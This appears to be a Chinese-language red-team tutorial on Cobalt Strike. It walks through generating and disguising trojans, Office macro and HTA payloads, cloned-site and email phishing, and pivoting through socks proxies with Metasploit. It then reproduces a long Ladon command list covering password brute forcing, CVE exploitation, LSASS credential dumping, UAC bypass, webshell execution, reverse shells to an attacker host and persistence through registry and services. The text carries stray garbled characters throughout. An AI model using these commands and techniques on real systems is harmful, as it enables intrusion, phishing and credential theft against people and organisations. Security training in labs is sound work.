apt可使用工具Cobalt Strike朗徊,cs主要用于內(nèi)網(wǎng)滲透以及APT攻擊尊勿。
1. cs使用
服務(wù)器端:kali(192.168.60.)
客戶端:windows(192.168.60.17)
1.啟動服務(wù)器端:
在安裝目錄下使用命令 ./teamserver ip 123456(密碼)
2.連接客戶端:
1.1 主機(jī)上線
1.選擇監(jiān)聽器伤塌,創(chuàng)建payload
2.生成木馬
選擇攻擊---生成木馬---windows Executa... ,選擇剛才設(shè)置的監(jiān)聽器见芹。
3.將生成的exe文件放在靶機(jī)上。
可以使用軟件安防文件捆綁器對兩個exe文件進(jìn)行捆綁和改變圖標(biāo)。
使用KilerRat可以將exe文件改變?yōu)槠渌缶Y名的文件罕邀。
3.在靶機(jī)運行之后就可以在客戶端查看并進(jìn)行操作。
1.2 結(jié)合metesploit养距,反彈shell
使用cs3.14版本诉探,客戶端是cobaltstrike.bat
1.在kali中輸入mafconsole,進(jìn)入msf.并進(jìn)行設(shè)置
2.在靶機(jī)中
使用Cobalt Strike創(chuàng)建一個windows/foreign/reverse_http的Listener。其中ip為Metasploit的ip地址棍厌,端口為Metasploit所監(jiān)聽的端口肾胯。
3.選擇增加會話,之后就可以在kali上看到的會話信息耘纱。
建立會話:
1.3 office宏payload應(yīng)用
1.在win7上安裝office 2003,然后再cs客戶端生成木馬敬肚,并選擇監(jiān)聽器。
選擇攻擊--生成后門--ms office...--選擇監(jiān)聽器束析。并將生成的文件復(fù)制到靶機(jī)中艳馒。
2.打開office軟件,把cs生成的代碼放到word宏里员寇。
一般是word默認(rèn)禁用所有宏(在工具----宏--安全性--選擇低)
弄慰,另外應(yīng)用位置不要設(shè)置所有的活動模板和文檔,建設(shè)應(yīng)用在當(dāng)前文檔蝶锋。
創(chuàng)建宏:
3.運行文檔時可在cs客戶端查看到新的會話陆爽。
1.4 https payload的應(yīng)用
可以免查殺,做到開機(jī)自啟動扳缕。
1.5 信息收集
網(wǎng)站短鏈接生成:https://tool.chinaz.com/tools/dwz.aspx
1.選擇攻擊---釣魚攻擊---信息收集
2.填寫信息之后點擊開始慌闭,將生成的url進(jìn)行復(fù)制
3.打開短連接生成地址,將剛才復(fù)制的url進(jìn)行短鏈接生成第献。
4.將生成的短鏈接進(jìn)行訪問贡必,可在視圖--應(yīng)用信息,查看到訪問的url信息庸毫。
可用于驗證ssrf,csrf漏洞是否真實存在衫樊,通過查看點擊鏈接之后在cs客戶端查看應(yīng)用信息飒赃,是否進(jìn)行頁面跳轉(zhuǎn)。
1.6 hta網(wǎng)頁掛馬
1.先生成hta文件科侈,選擇攻擊---生成后門---html Application....選擇監(jiān)聽器载佳,將method改為powershell。選擇保存臀栈。
2.使用文件下載蔫慧。并進(jìn)行設(shè)置。
點擊開始之后权薯,evil.hta文件會自動上傳到cs目錄下的uploads文件夾下姑躲。
3.克隆網(wǎng)站睡扬,并進(jìn)行設(shè)置。
攻擊---釣魚攻擊--克隆網(wǎng)站黍析。
http://192.168.60.67:1245/evil.hta
4.把生成的鏈接復(fù)制出來到瀏覽器卖怜。
下載文件運行之后,可以在web日志看到剛才輸入的數(shù)據(jù)阐枣。
1.7 郵件釣魚
1.點擊攻擊--郵件釣魚马靠,將下面內(nèi)容填寫完整。
mail server:填寫的是發(fā)件人的賬號蔼两,smtp授權(quán)碼甩鳄,端口等信息。
郵件內(nèi)容是由郵箱中下載進(jìn)行修改而來的额划。
在郵箱中開啟smtp服務(wù)妙啃。
3.可以在收件箱看到剛才發(fā)送的郵件。
1.8 Socks代理應(yīng)用(橫向滲透)
本次實驗需要三臺虛擬機(jī)锁孟,kali(cs服務(wù)器端)彬祖,2007(60網(wǎng)段/0網(wǎng)段 ip192.168.0.2)、2010(0網(wǎng)段(192.168.0.3)品抽,是被控制的機(jī)器储笑,作為跳板攻擊內(nèi)網(wǎng))
1.給2007系統(tǒng)添加一個網(wǎng)卡,并設(shè)置lan網(wǎng)段圆恤。
并設(shè)置第二張網(wǎng)卡IP是192.168.0.2
設(shè)置win10系統(tǒng)ip為192.168.0.3
2.設(shè)置cs客戶端突倍。設(shè)置代理端口。端口號為25172
2.查看已搭建的代理盆昙。并點擊Tunnel 將點擊之后生成的代碼復(fù)制到msf中運行羽历。這樣就可以利用msf遠(yuǎn)程攻擊192.168.0.3所在的主機(jī)。
3.利用msf模塊直接攻擊
1.8.2 設(shè)置kali的軟件socks代理
1.可以開啟socks4a代理淡喜,通過代理進(jìn)行內(nèi)網(wǎng)滲透
開啟socks秕磷,可以通過命令,也可以通過右鍵Pivoting->SOCKS Server
beacon> socks 端口號
[+] started SOCKS4a server on: 2222
[+] host called home, sent: 16 bytes
然后vim /etc/proxychains.conf 炼团,在文件末尾添加socks4代理服務(wù)器澎嚣。
socks4 127.0.0.1 端口號
例子:
使用proxychains代理掃描內(nèi)網(wǎng)主機(jī) proxychains nmap -sP 192.168.183.0/24。
在使用的插件前都加上proxychains瘟芝。
2.也可以在連接的主機(jī)上通過
設(shè)置 中轉(zhuǎn)---Deploy vpn設(shè)置虛擬網(wǎng)卡就行內(nèi)網(wǎng)滲透易桃。
1.9 cs提權(quán)和內(nèi)網(wǎng)滲透
需要在guthub上下載插件:
https://github.com/rsmudge/Elevatekit
https://github.com/k8gege/Aggressor
landon用法:http://k8gege.org/Ladon/
##### 001 多協(xié)議探測存活主機(jī) (IP、機(jī)器名锌俱、MAC地址晤郑、制造商)
Ladon 192.168.1.8/24 OnlinePC
##### 002 多協(xié)議識別操作系統(tǒng) (IP、機(jī)器名、操作系統(tǒng)版本造寝、開放服務(wù))
Ladon 192.168.1.8/24 OsScan
##### 003 掃描存活主機(jī)
Ladon 192.168.1.8/24 OnlineIP
##### 004 ICMP掃描存活主機(jī)
Ladon 192.168.1.8/24 Ping
##### 005 掃描SMB漏洞MS17010 (IP磕洪、機(jī)器名、漏洞編號匹舞、操作系統(tǒng)版本)
Ladon 192.168.1.8/24 MS17010
##### 006 SMBGhost漏洞檢測 CVE-2020-0796 (IP褐鸥、機(jī)器名、漏洞編號赐稽、操作系統(tǒng)版本)
Ladon 192.168.1.8/24 SMBGhost
##### []007 掃描Web信息/Http服務(wù)
Ladon 192.168.1.8/24 WebScan
##### []008 掃描C段站點URL域名
Ladon 192.168.1.8/24 UrlScan
##### 009 掃描C段站點URL域名
Ladon 192.168.1.8/24 SameWeb
##### 010 掃描子域名叫榕、二級域名
Ladon baidu.com SubDomain
##### 011 域名解析IP、主機(jī)名解析IP
Ladon baidu.com DomainIP Ladon baidu.com HostIP
#####012 域內(nèi)機(jī)器信息獲取
Ladon AdiDnsDump 192.168.1.8 (Domain IP)
##### 013 掃描C段端口姊舵、指定端口掃描
Ladon 192.168.1.8/24 PortScan Ladon 192.168.1.8 PortScan 80,445,3389
##### 014 掃描C段WEB以及CMS(75種Web指紋識別)
Ladon 192.168.1.8/24 WhatCMS
##### 015 掃描思科設(shè)備
Ladon 192.168.1.8/24 CiscoScan Ladon [http://192.168.1.8](http://192.168.1.8/) CiscoScan
##### [016 枚舉Mssql數(shù)據(jù)庫主機(jī) (數(shù)據(jù)庫IP晰绎、機(jī)器名、SQL版本)
Ladon EnumMssql
##### 017 枚舉網(wǎng)絡(luò)共享資源 (域括丁、存活I(lǐng)P荞下、共享路徑)
Ladon EnumShare
##### 018 掃描LDAP服務(wù)器
Ladon 192.168.1.8/24 LdapScan
##### 019 掃描FTP服務(wù)器
Ladon 192.168.1.8/24 FtpScan
###暴力破解/網(wǎng)絡(luò)認(rèn)證/弱口令/密碼爆破/數(shù)據(jù)庫/網(wǎng)站后臺/登陸口/系統(tǒng)登陸
密碼爆破詳解參考SSH:[http://k8gege.org/Ladon/sshscan.html](http://k8gege.org/Ladon/sshscan.html)
#####020 445端口 SMB密碼爆破(Windows)
Ladon 192.168.1.8/24 SmbScan
#####021 135端口 Wmi密碼爆破(Windowns)
Ladon 192.168.1.8/24 WmiScan
##### 022 389端口 LDAP服務(wù)器、AD域密碼爆破(Windows)
Ladon 192.168.1.8/24 LdapScan
##### 023 5985端口 Winrm密碼爆破(Windowns)
Ladon 192.168.1.8/24 WinrmScan.ini
##### 024 445端口 SMB NTLM HASH爆破(Windows)
Ladon 192.168.1.8/24 SmbHashScan
##### 025 135端口 Wmi NTLM HASH爆破(Windows)
Ladon 192.168.1.8/24 WmiHashScan
##### 026 22端口 SSH密碼爆破(Linux)
Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan
##### 027 1433端口 Mssql數(shù)據(jù)庫密碼爆破
Ladon 192.168.1.8/24 MssqlScan
##### 028 1521端口 Oracle數(shù)據(jù)庫密碼爆破
Ladon 192.168.1.8/24 OracleScan
##### 029 3306端口 Mysql數(shù)據(jù)庫密碼爆破
Ladon 192.168.1.8/24 MysqlScan
##### 030 7001端口 Weblogic后臺密碼爆破
Ladon [http://192.168.1.8:7001/console](http://192.168.1.8:7001/console) WeblogicScan Ladon 192.168.1.8/24 WeblogicScan
##### [031 5900端口 VNC遠(yuǎn)程桌面密碼爆破
Ladon 192.168.1.8/24 VncScan
##### 032 21端口 Ftp服務(wù)器密碼爆破
Ladon 192.168.1.8/24 FtpScan
#####033 8080端口 Tomcat后臺登陸密碼爆破
Ladon 192.168.1.8/24 TomcatScan Ladon [http://192.168.1.8:8080/manage](http://192.168.1.8:8080/manage) TomcatScan
##### 034 Web端口 401基礎(chǔ)認(rèn)證密碼爆破
Ladon [http://192.168.1.8/login](http://192.168.1.8/login) HttpBasicScan
##### 035 445端口 Impacket SMB密碼爆破(Windowns)
Ladon 192.168.1.8/24 SmbScan.ini
##### 036 445端口 IPC密碼爆破(Windowns)
Ladon 192.168.1.8/24 IpcScan.ini
### []漏洞檢測/漏洞利用/Poc/Exp
##### [](https://github.com/k8gege/Aggressor#037-smb%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8Bcve-2017-0143cve-2017-0144)037 SMB漏洞檢測(CVE-2017-0143/CVE-2017-0144)
Ladon 192.168.1.8/24 MS17010
#####038 Weblogic漏洞檢測(CVE-2019-2725/CVE-2018-2894)
Ladon 192.168.1.8/24 WeblogicPoc
#####039 PhpStudy后門檢測(phpstudy 2016/phpstudy 2018)
Ladon 192.168.1.8/24 PhpStudyPoc
##### 040 ActiveMQ漏洞檢測(CVE-2016-3088)
Ladon 192.168.1.8/24 ActivemqPoc
#####041 Tomcat漏洞檢測(CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatPoc
##### 042 Weblogic漏洞利用(CVE-2019-2725)
Ladon 192.168.1.8/24 WeblogicExp
##### 043 Tomcat漏洞利用(CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatExp
##### 044 Struts2漏洞檢測(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
Ladon 192.168.1.8/24 Struts2Poc
### FTP下載史飞、HTTP下載
##### 045 HTTP下載
Ladon HttpDownLoad [http://k8gege.org/Download/Ladon.rar](http://k8gege.org/Download/Ladon.rar)
##### 046 Ftp下載
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
### 加密解密(HEX/Base64)
##### 047 Hex加密解密
Ladon 123456 EnHex Ladon 313233343536 DeHex
##### [](https://github.com/k8gege/Aggressor#048-base64%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86)048 Base64加密解密
Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64
### 網(wǎng)絡(luò)嗅探
##### 049 Ftp密碼嗅探
Ladon FtpSniffer 192.168.1.5
##### 050 HTTP密碼嗅探
Ladon HTTPSniffer 192.168.1.5
##### 051 網(wǎng)絡(luò)嗅探
Ladon Sniffer
###密碼讀取
##### 052 讀取IIS站點密碼尖昏、網(wǎng)站路徑
Ladon IISpwd
##### DumpLsass內(nèi)存密碼
Ladon DumpLsass
### 信息收集
#####053 進(jìn)程詳細(xì)信息
Ladon EnumProcess Ladon Tasklist
#####054 獲取命令行參數(shù)
Ladon cmdline Ladon cmdline cmd.exe
#####055 獲取滲透基礎(chǔ)信息
Ladon GetInfo Ladon GetInfo2
##### 056 .NET & PowerShell版本
Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion
##### 057 運行時版本&編譯環(huán)境
Ladon Ver Ladon Version
### 遠(yuǎn)程執(zhí)行(psexec/wmiexec/atexec/sshexec)
#####445端口 PSEXEC遠(yuǎn)程執(zhí)行命令(交互式)
net user \192.168.1.8 k8gege520 /user:k8gege Ladon psexec 192.168.1.8 psexec> whoami nt authority\system
##### 058 135端口 WmiExec遠(yuǎn)程執(zhí)行命令 (非交互式)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
##### 059 445端口 AtExec遠(yuǎn)程執(zhí)行命令(非交互式)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
#####060 22端口 SshExec遠(yuǎn)程執(zhí)行命令(非交互式)
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
##### 061 JspShell遠(yuǎn)程執(zhí)行命令(非交互式)
Usage:Ladon JspShell type url pwd cmd Example: Ladon JspShell ua [http://192.168.1.8/shell.jsp](http://192.168.1.8/shell.jsp) Ladon whoami
#### 062 WebShell遠(yuǎn)程執(zhí)行命令(非交互式)
source-shell
Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
### 提權(quán)降權(quán)
##### 063 BypassUac 繞過UAC執(zhí)行,支持Win7-Win10
Ladon BypassUac c:\1.exe Ladon BypassUac c:\1.bat
##### 064 GetSystem 提權(quán)或降權(quán)運行程序
Ladon GetSystem cmd.exe Ladon GetSystem cmd.exe explorer
##### 065 Runas 模擬用戶執(zhí)行命令
Ladon Runas user pass cmd
### 其它功能
#####066 一鍵啟用.net 3.5
Ladon EnableDotNet
##### 067 獲取內(nèi)網(wǎng)站點HTML源碼
Ladon gethtml [http://192.168.1.1](http://192.168.1.1/)
#####068 檢測后門
Ladon CheckDoor Ladon AutoRun
##### 069 獲取本機(jī)內(nèi)網(wǎng)IP與外網(wǎng)IP
Ladon GetIP
##### 070 一鍵迷你WEB服務(wù)器
Ladon WebSer 80 Ladon web 80
### []反彈Shell
##### 071 反彈TCP NC Shell
Ladon ReverseTcp 192.168.1.8 4444 nc
##### 072 反彈TCP MSF Shell
Ladon ReverseTcp 192.168.1.8 4444 shell
##### 073 反彈TCP MSF MET Shell
Ladon ReverseTcp 192.168.1.8 4444 meter
##### 074 反彈HTTP MSF MET Shell
Ladon ReverseHttp 192.168.1.8 4444
#####075 反彈HTTPS MSF MET Shell
Ladon ReverseHttps 192.168.1.8 4444
##### 076 反彈TCP CMD & PowerShell Shell
Ladon PowerCat -r 192.168.1.8 4444 cmd Ladon PowerCat -r 192.168.1.8 4444 psh
##### 077 反彈UDP Cmd & PowerShell Shell
Ladon PowerCat -r 192.168.1.110 4444 cmd -u Ladon PowerCat -r 192.168.1.8 4444 psh -u
##### 078 RDP桌面會話劫持(無需密碼)
Ladon RDPHijack 3 Ladon RDPHijack 3 console
##### 079 OXID定位多網(wǎng)卡主機(jī)
Ladon 192.168.1.8/24 EthScan Ladon 192.168.1.8/24 OxidScan
#### 080 查看用戶最近訪問文件
Ladon Recent
#### 081 添加注冊表Run啟動項
Ladon RegAuto Test c:\123.exe
####082 AT計劃執(zhí)行程序(無需時間)(system權(quán)限)
Ladon at c:\123.exe Ladon at c:\123.exe gui
#### 083 SC服務(wù)加啟動項&執(zhí)行程序(system權(quán)限)
Ladon sc c:\123.exe Ladon sc c:\123.exe gui Ladon sc c:\123.exe auto ServerName
1.安裝插件,選擇腳本管理器---load.
加載之后再選擇提權(quán)构资,重新選擇exploit抽诉。就可以進(jìn)行提權(quán)。